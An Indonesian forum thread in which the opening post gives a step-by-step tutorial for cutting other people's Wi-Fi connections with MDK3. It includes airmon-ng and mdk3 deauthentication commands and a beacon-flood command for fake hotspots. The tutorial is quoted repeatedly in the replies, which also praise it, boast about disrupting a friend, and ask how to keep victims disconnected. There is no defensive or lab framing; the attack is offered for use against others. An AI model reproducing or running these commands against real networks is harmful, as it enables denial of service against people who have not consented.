Cara Mematikan koneksi orang lain

by Fachrel Marpaung - 04-20-2016 at 01:47 PM
Junior Member
Posts:
5
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 04-20-2016, 01:47 PM
Halo Teman-teman kali ini saya ingin membuat tutorial tentang mematikan koneksi orang lain menggunakan MDK3
Soal penginstalan mungkin sudah di bahas
oke langsung aja pertama kita buka terminalnya
dan ketikkan
- sudo su
setelah terbuka ketikkan perintah berikut
- airmon-ng start wlan0

setelah berhasil seperti ini
[Image: AXcLjYu.png]
setelah berhasil kita ketik
-ifconfig wlan0
ntar bakal muncul mac 
[Image: l4a5Ew2.png]
sorry kalau di sensor :D
kalau uda itunya di copy terus ketik di terminal
echo mac anda >> x.txt
nb:x.txt bisa di ganti sesuai keinginan

kalau sudah terus di eksekusi deh langsung
mdk3 mon0 d -w x.txt


[Image: 8jAtOfA.png]
kalau uda gitu cek cek lagi ke temen atau ke orang lain uda mati belum koneksinya kalau buat hotspot palsu juga bisa
caranya buat dlu listnya di file txt atau list ekstensinya
nahh ntar kalau uda tinggal mainin dah
mdk3 mon0 b -f  list.txt
[Image: Mtyn1lP.png]

Sekian dari saya Salam anak Backbox dari Medan Good Luck !
Learn Is Fun  :D
Reply
Find Posts
Administrator
Administrators
Posts:
91
Joined:
Mar 2016
Likes:
2
Reputation:
0
2 Year Of Member
#2
Posted: 04-21-2016, 03:30 AM
(04-20-2016, 01:47 PM)Fachrel Marpaung Wrote: Halo Teman-teman kali ini saya ingin membuat tutorial tentang mematikan koneksi orang lain menggunakan MDK3
Soal penginstalan mungkin sudah di bahas
oke langsung aja pertama kita buka terminalnya
dan ketikkan
- sudo su
setelah terbuka ketikkan perintah berikut
- airmon-ng start wlan0

setelah berhasil seperti ini
[Image: AXcLjYu.png]
setelah berhasil kita ketik
-ifconfig wlan0
ntar bakal muncul mac 
[Image: l4a5Ew2.png]
sorry kalau di sensor :D
kalau uda itunya di copy terus ketik di terminal
echo mac anda >> x.txt
nb:x.txt bisa di ganti sesuai keinginan

kalau sudah terus di eksekusi deh langsung
mdk3 mon0 d -w x.txt


[Image: 8jAtOfA.png]
kalau uda gitu cek cek lagi ke temen atau ke orang lain uda mati belum koneksinya kalau buat hotspot palsu juga bisa
caranya buat dlu listnya di file txt atau list ekstensinya
nahh ntar kalau uda tinggal mainin dah
mdk3 mon0 b -f  list.txt
[Image: Mtyn1lP.png]

Sekian dari saya Salam anak Backbox dari Medan Good Luck !
Learn Is Fun  :D

Nice post kang (y)
Reply
Find Posts
Junior Member
Posts:
37
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
Posted: 04-22-2016, 01:42 AM
sukses bikin temen ane protes gan (y)
Reply
Find Posts
Network Security Analyst
Administrators
Posts:
18
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 04-22-2016, 05:40 PM
Nice thread om :D
={EXPLORE|EXPLOIT|HAVE FUN!}=
Reply
Find Posts
Junior Member
Posts:
2
Joined:
Apr 2016
Likes:
0
Reputation:
0
2 Year Of Member
#5
Posted: 04-24-2016, 01:04 PM
cara instalnya gmana gan mf newbie nih
Reply
Find Posts
Satpam
Moderators
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#6
Posted: 04-26-2016, 07:30 AM
(04-24-2016, 01:04 PM)si_bungsu123 Wrote: cara instalnya gmana gan mf newbie nih

Install manual mdk3 nya,mas.
Terus itu download mdk3-v6.patch
sudo make install

coba cek google biar lebih paham.
Reply
Find Posts
Junior Member
Posts:
37
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#7
Posted: 05-10-2016, 12:41 PM (This post was last modified: 05-10-2016, 12:42 PM by ./EL-Mueeza_23.)
om ,
kalo misalnya masukin lebih dari satu mac adress gimana pak ?
soalnya ane pernah save di satu file ada dua mac adress tetep gak bisa
yang satu ke dissconnect
Reply
Find Posts
Junior Member
Posts:
6
Joined:
May 2018
Likes:
0
Reputation:
0
#8
Posted: 05-28-2018, 03:32 PM
(04-20-2016, 01:47 PM)Fachrel Marpaung Wrote: Halo Teman-teman kali ini saya ingin membuat tutorial tentang mematikan koneksi orang lain menggunakan MDK3
Soal penginstalan mungkin sudah di bahas
oke langsung aja pertama kita buka terminalnya
dan ketikkan
- sudo su
setelah terbuka ketikkan perintah berikut
- airmon-ng start wlan0

setelah berhasil seperti ini
[Image: AXcLjYu.png]
setelah berhasil kita ketik
-ifconfig wlan0
ntar bakal muncul mac 
[Image: l4a5Ew2.png]
sorry kalau di sensor :D
kalau uda itunya di copy terus ketik di terminal
echo mac anda >> x.txt
nb:x.txt bisa di ganti sesuai keinginan

kalau sudah terus di eksekusi deh langsung
mdk3 mon0 d -w x.txt


[Image: 8jAtOfA.png]
kalau uda gitu cek cek lagi ke temen atau ke orang lain uda mati belum koneksinya kalau buat hotspot palsu juga bisa
caranya buat dlu listnya di file txt atau list ekstensinya
nahh ntar kalau uda tinggal mainin dah
mdk3 mon0 b -f  list.txt
[Image: Mtyn1lP.png]

Sekian dari saya Salam anak Backbox dari Medan Good Luck !
Learn Is Fun  :D


berhasil sich kan tapii tetap masih bisa konek gan, ada cara agar diblock koneknya lagi gan
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
2 Guest(s)